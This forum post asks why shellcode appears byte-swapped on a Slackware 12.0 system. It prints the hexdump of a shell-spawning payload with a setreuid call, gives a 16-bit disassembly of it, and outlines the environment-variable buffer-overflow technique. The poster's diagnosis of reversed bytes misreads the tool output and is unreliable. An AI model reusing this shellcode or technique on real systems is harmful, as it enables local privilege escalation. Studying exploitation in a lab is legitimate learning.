I put this in Security, as I thought it would more likely attract people knowledgeable about the subject, than in the general slack 12.0 forum.
Anyway, as is indicated, I'm using slack 12.0 and kernel 18.104.22.168-smp.
I am a C programmer and I like to experiment with various exploitation techniques, such as buffer overflows and format string vulns and et cetera. However, due to various reasons, I haven't been using linux for almost, well, 6 months now, and therefore haven't really been playing around with those techniques.
I decided to start again, as I just got a new laptop, and downloaded and install slack 12.0.
During my endeavors to exploit a simple application locally, I've run into nothing but trouble. First, I noticed that the kernel used stack address space randomization, and found out how to disable that. However, I also noticed how sometimes, the little-endianness(this is the only way I can describe it really) was strange. Like it reverse the bytes in two-byte words instead of 4 byte words.
An example would be the following:
I have shellcode which spawns a shell when executed. On the disk, for some reason, it looks like this:
$ hexdump shellcode
0000000 c031 46b0 db31 c931 80cd 16eb 315b 88c0
0000010 0743 5b89 8908 0c43 0bb0 4b8d 8d08 0c53
0000020 80cd e5e8 ffff 2fff 6962 2f6e 6873
but disassembles to
00000000 31C0 xor ax,ax
00000002 B046 mov al,0x46
00000004 31DB xor bx,bx
00000006 31C9 xor cx,cx
00000008 CD80 int 0x80
0000000A EB16 jmp short 0x22
0000000C 5B pop bx
0000000D 31C0 xor ax,ax
0000000F 884307 mov [bp+di+0x7],al
00000012 895B08 mov [bp+di+0x8],bx
00000015 89430C mov [bp+di+0xc],ax
00000018 B00B mov al,0xb
0000001A 8D4B08 lea cx,[bp+di+0x8]
0000001D 8D530C lea dx,[bp+di+0xc]
00000020 CD80 int 0x80
00000022 E8E5FF call 0xa
00000025 FF db 0xFF
00000026 FF2F jmp far [bx]
00000028 62696E bound bp,[bx+di+0x6e]
0000002B 2F das
0000002C 7368 jnc 0x96
As you can see, all two byte words are reversed. 31c0 on disk becomes c031, and 46b0 becomes b046.
This is bad, because one of the exploitation techniques is, for example, to cat the shellcode from the disk into an environment variable and then retrieve the address of it, then overwrite a buffer and make it execute the code in the variable.
However, if the code is wrong in the environment variable, I can't really do that.
So I ask: What is causing this? Is this the kernel using some optimized memory management that wasn't in slack 11.0's default kernel, or is it the file system? I'm using ext3, by the way.
All help _greatly_ appreciated. I've just promised to hold a lecture on the subject in an irc channel I frequent, and I can't really do that if I can demonstrate the techniques.